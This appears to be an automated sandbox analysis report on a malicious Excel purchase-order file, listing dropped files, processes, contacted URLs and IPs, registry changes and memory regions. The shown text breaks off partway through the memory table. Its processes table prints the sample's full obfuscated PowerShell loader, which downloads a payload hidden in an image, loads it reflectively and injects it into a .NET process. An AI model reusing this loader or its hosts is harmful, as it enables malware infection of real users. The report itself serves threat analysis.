Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
orden de compra.xlam.xlsx
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\portugalslovenia.js
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$orden de compra.xlam.xlsx
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\portugalslovenia[1].jpg
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\22ev4n4c.e1q.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\lrw43k3g.p0a.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Desktop\~$orden de compra.xlam.xls
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
|
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama;
t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' {
Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne
t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama;
t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag);
if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth
= t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes
= [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes);
t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]]
(Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma))
} }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a;
t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch
{ Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) {
t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag
= Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag);
if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength
= t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes
= [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes);
t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+'
[ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma))
} }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Ama;
|
unknown
|
|
|
|
http://192.3.243.156/portugalslovenia.jpeg
|
192.3.243.156
|
|
|
|
https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612Ama;
|
unknown
|
|
|
|
http://192.3.243.156/ourTraditionalbase.txt
|
192.3.243.156
|
|
|
|
https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612
|
unknown
|
|
|
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
|
188.114.96.3
|
|
|
|
http://192.3.243.156/portugalslovenia.jpega
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://192.3.243.156/portugalslovenia.jpegj
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtz
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt
|
unknown
|
||
|
http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtC:
|
unknown
|
||
|
http://www.w3.
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
http://192.3.243.156/portugalslovenia.jpegr
|
unknown
|
||
|
http://go.microsoft.c
|
unknown
|
||
|
http://192.3.243.156/portugalslovenia.jpeguuC:
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
|
http://192.3.243.156
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip-api.com
|
208.95.112.1
|
|
|
|
uploaddeimagens.com.br
|
188.114.96.3
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
192.3.243.156
|
unknown
|
United States
|
|
|
|
41.216.183.13
|
unknown
|
South Africa
|
|
|
|
188.114.96.3
|
uploaddeimagens.com.br
|
European Union
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
:;$
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
"$
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 35 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3AA4000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
3499000
|
trusted library allocation
|
page read and write
|
|
|
|
5766000
|
heap
|
page read and write
|
||
|
4E4000
|
heap
|
page read and write
|
||
|
25CB000
|
trusted library allocation
|
page read and write
|
||
|
445B000
|
stack
|
page read and write
|
||
|
7DC000
|
heap
|
page read and write
|
||
|
4C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25DC000
|
trusted library allocation
|
page read and write
|
||
|
2519000
|
trusted library allocation
|
page read and write
|
||
|
873C000
|
stack
|
page read and write
|
||
|
510E000
|
stack
|
page read and write
|
||
|
4FEC000
|
stack
|
page read and write
|
||
|
1E00000
|
direct allocation
|
page read and write
|
||
|
C8E000
|
stack
|
page read and write
|
||
|
2243000
|
trusted library allocation
|
page read and write
|
||
|
773000
|
heap
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
7D4000
|
heap
|
page read and write
|
||
|
740E000
|
stack
|
page read and write
|
||
|
25ED000
|
trusted library allocation
|
page read and write
|
||
|
1D90000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
3620000
|
trusted library allocation
|
page read and write
|
||
|
356000
|
stack
|
page read and write
|
||
|
1D6F000
|
stack
|
page read and write
|
||
|
4ECF000
|
stack
|
page read and write
|
||
|
3511000
|
trusted library allocation
|
page read and write
|
||
|
2290000
|
heap
|
page execute and read and write
|
||
|
51C000
|
stack
|
page read and write
|
||
|
3F0000
|
trusted library allocation
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
31EE000
|
stack
|
page read and write
|
||
|
25D6000
|
trusted library allocation
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
6C3000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1A0000
|
trusted library allocation
|
page read and write
|
||
|
79E000
|
heap
|
page read and write
|
||
|
103E000
|
stack
|
page read and write
|
||
|
66FB000
|
trusted library allocation
|
page read and write
|
||
|
8C3F000
|
stack
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
1D6E000
|
stack
|
page read and write | page guard
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
3D3F000
|
stack
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
207F000
|
stack
|
page read and write
|
||
|
7CA000
|
heap
|
page read and write
|
||
|
3BE000
|
stack
|
page read and write
|
||
|
50AE000
|
stack
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
2331000
|
trusted library allocation
|
page read and write
|
||
|
7D4000
|
heap
|
page read and write
|
||
|
4A3F000
|
stack
|
page read and write
|
||
|
5E7000
|
heap
|
page read and write
|
||
|
89FF000
|
stack
|
page read and write
|
||
|
54BB000
|
heap
|
page read and write
|
||
|
7AF000
|
heap
|
page read and write
|
||
|
2B40000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
5A7E000
|
stack
|
page read and write
|
||
|
20F0000
|
trusted library allocation
|
page read and write
|
||
|
393000
|
heap
|
page read and write
|
||
|
25DC000
|
trusted library allocation
|
page read and write
|
||
|
29AF000
|
stack
|
page read and write
|
||
|
1E42000
|
heap
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
9030000
|
heap
|
page read and write
|
||
|
4FE0000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
693000
|
heap
|
page read and write
|
||
|
792000
|
heap
|
page read and write
|
||
|
51AF000
|
stack
|
page read and write
|
||
|
481D000
|
stack
|
page read and write
|
||
|
487E000
|
stack
|
page read and write
|
||
|
4E8000
|
heap
|
page read and write
|
||
|
2511000
|
trusted library allocation
|
page read and write
|
||
|
78D000
|
heap
|
page read and write
|
||
|
504E000
|
stack
|
page read and write
|
||
|
22F0000
|
heap
|
page execute and read and write
|
||
|
6843000
|
trusted library allocation
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
3539000
|
trusted library allocation
|
page read and write
|
||
|
6280000
|
heap
|
page read and write
|
||
|
43DA000
|
stack
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
77E000
|
heap
|
page read and write
|
||
|
2221000
|
trusted library allocation
|
page read and write
|
||
|
53BD000
|
heap
|
page read and write
|
||
|
949000
|
heap
|
page read and write
|
||
|
25C2000
|
trusted library allocation
|
page read and write
|
||
|
4360000
|
trusted library allocation
|
page execute and read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
4B00000
|
heap
|
page read and write
|
||
|
8FF0000
|
heap
|
page read and write
|
||
|
40F000
|
heap
|
page read and write
|
||
|
CED000
|
stack
|
page read and write
|
||
|
540000
|
heap
|
page read and write
|
||
|
25EB000
|
trusted library allocation
|
page read and write
|
||
|
2100000
|
trusted library allocation
|
page read and write
|
||
|
52AE000
|
stack
|
page read and write
|
||
|
48E000
|
stack
|
page read and write
|
||
|
2F0000
|
trusted library allocation
|
page read and write
|
||
|
3590000
|
heap
|
page read and write
|
||
|
644000
|
heap
|
page read and write
|
||
|
2545000
|
trusted library allocation
|
page read and write
|
||
|
3F0E000
|
stack
|
page read and write
|
||
|
163000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
887000
|
heap
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
89E000
|
heap
|
page read and write
|
||
|
2A4D000
|
heap
|
page read and write
|
||
|
220000
|
trusted library allocation
|
page read and write
|
||
|
30C000
|
stack
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
857000
|
heap
|
page read and write
|
||
|
2511000
|
trusted library allocation
|
page read and write
|
||
|
24DF000
|
stack
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
610000
|
heap
|
page read and write
|
||
|
500B000
|
heap
|
page read and write
|
||
|
75D000
|
heap
|
page read and write
|
||
|
25B1000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
455E000
|
stack
|
page read and write
|
||
|
799000
|
heap
|
page read and write
|
||
|
1F7E000
|
stack
|
page read and write
|
||
|
8F2C000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
5B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
562000
|
heap
|
page read and write
|
||
|
23DF000
|
stack
|
page read and write
|
||
|
49FF000
|
stack
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
7DC000
|
heap
|
page read and write
|
||
|
4B0000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
trusted library allocation
|
page execute and read and write
|
||
|
197000
|
stack
|
page read and write
|
||
|
4FEC000
|
stack
|
page read and write
|
||
|
E6E000
|
stack
|
page read and write | page guard
|
||
|
E6F000
|
stack
|
page read and write
|
||
|
660A000
|
trusted library allocation
|
page read and write
|
||
|
56DD000
|
stack
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
5D0000
|
trusted library allocation
|
page read and write
|
||
|
B5E000
|
stack
|
page read and write
|
||
|
4F2D000
|
stack
|
page read and write
|
||
|
510000
|
trusted library allocation
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
643000
|
heap
|
page read and write
|
||
|
733E000
|
stack
|
page read and write
|
||
|
4340000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
trusted library allocation
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
1D80000
|
trusted library allocation
|
page read and write
|
||
|
792000
|
heap
|
page read and write
|
||
|
434000
|
heap
|
page read and write
|
||
|
5ECE000
|
stack
|
page read and write
|
||
|
1D2000
|
trusted library allocation
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
532E000
|
stack
|
page read and write | page guard
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
1BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
5CAE000
|
stack
|
page read and write
|
||
|
B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
FB2000
|
heap
|
page read and write
|
||
|
460C000
|
stack
|
page read and write
|
||
|
74F000
|
heap
|
page read and write
|
||
|
4A3E000
|
stack
|
page read and write
|
||
|
54A0000
|
heap
|
page read and write
|
||
|
2233000
|
trusted library allocation
|
page read and write
|
||
|
AE0000
|
heap
|
page read and write
|
||
|
190000
|
remote allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
877F000
|
stack
|
page read and write
|
||
|
5751000
|
heap
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
799000
|
heap
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
DA000
|
stack
|
page read and write
|
||
|
622000
|
heap
|
page read and write
|
||
|
5EB0000
|
heap
|
page read and write
|
||
|
772000
|
heap
|
page read and write
|
||
|
1D2000
|
trusted library allocation
|
page read and write
|
||
|
25EE000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
547D000
|
heap
|
page read and write
|
||
|
8E20000
|
heap
|
page read and write
|
||
|
63A5000
|
trusted library allocation
|
page read and write
|
||
|
8A00000
|
heap
|
page read and write
|
||
|
286000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E6000
|
heap
|
page read and write
|
||
|
262F000
|
stack
|
page read and write
|
||
|
60F000
|
heap
|
page read and write
|
||
|
6C5000
|
heap
|
page read and write
|
||
|
2120000
|
trusted library allocation
|
page read and write
|
||
|
236F000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3CF000
|
heap
|
page read and write
|
||
|
5FD000
|
stack
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
5BE0000
|
heap
|
page read and write
|
||
|
1D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
1C7000
|
heap
|
page read and write
|
||
|
1DFE000
|
stack
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
5F40000
|
heap
|
page read and write
|
||
|
7CA000
|
heap
|
page read and write
|
||
|
4BEE000
|
stack
|
page read and write
|
||
|
3539000
|
trusted library allocation
|
page read and write
|
||
|
3520000
|
heap
|
page read and write
|
||
|
270000
|
trusted library section
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
6040000
|
heap
|
page read and write
|
||
|
54B1000
|
heap
|
page read and write
|
||
|
75D000
|
heap
|
page read and write
|
||
|
366000
|
heap
|
page read and write
|
||
|
7D7000
|
heap
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
25D8000
|
trusted library allocation
|
page read and write
|
||
|
42FE000
|
stack
|
page read and write
|
||
|
E3E000
|
stack
|
page read and write
|
||
|
B4000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
10DE000
|
stack
|
page read and write
|
||
|
25AE000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
8580000
|
heap
|
page read and write
|
||
|
552000
|
heap
|
page read and write
|
||
|
5F2E000
|
stack
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page read and write
|
||
|
493E000
|
stack
|
page read and write
|
||
|
79B000
|
heap
|
page read and write
|
||
|
696000
|
heap
|
page read and write
|
||
|
1DDD000
|
stack
|
page read and write
|
||
|
4B22000
|
heap
|
page read and write
|
||
|
6383000
|
trusted library allocation
|
page read and write
|
||
|
2A30000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page execute and read and write
|
||
|
2110000
|
trusted library allocation
|
page read and write
|
||
|
520E000
|
stack
|
page read and write
|
||
|
319E000
|
stack
|
page read and write
|
||
|
799000
|
heap
|
page read and write
|
||
|
532F000
|
stack
|
page read and write
|
||
|
7CA000
|
heap
|
page read and write
|
||
|
C0000
|
heap
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
8D8D000
|
stack
|
page read and write
|
||
|
4AEE000
|
stack
|
page read and write
|
||
|
5F30000
|
heap
|
page read and write
|
||
|
1C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
62C1000
|
trusted library allocation
|
page read and write
|
||
|
4B8D000
|
stack
|
page read and write
|
||
|
25CB000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
75E000
|
heap
|
page read and write
|
||
|
25A4000
|
trusted library allocation
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
2A0000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
1D70000
|
trusted library allocation
|
page read and write
|
||
|
269000
|
stack
|
page read and write
|
||
|
9050000
|
heap
|
page read and write
|
||
|
4DE000
|
heap
|
page read and write
|
||
|
5CF0000
|
heap
|
page read and write
|
||
|
853D000
|
stack
|
page read and write
|
||
|
88BD000
|
stack
|
page read and write
|
||
|
9030000
|
trusted library allocation
|
page read and write
|
||
|
29B000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BA0000
|
heap
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4D0000
|
trusted library allocation
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
74D000
|
heap
|
page read and write
|
||
|
5D3E000
|
stack
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
4D4F000
|
stack
|
page read and write
|
||
|
1D7000
|
trusted library allocation
|
page execute and read and write
|
||
|
25D6000
|
trusted library allocation
|
page read and write
|
||
|
4B4000
|
heap
|
page read and write
|
||
|
8D3F000
|
stack
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
F94000
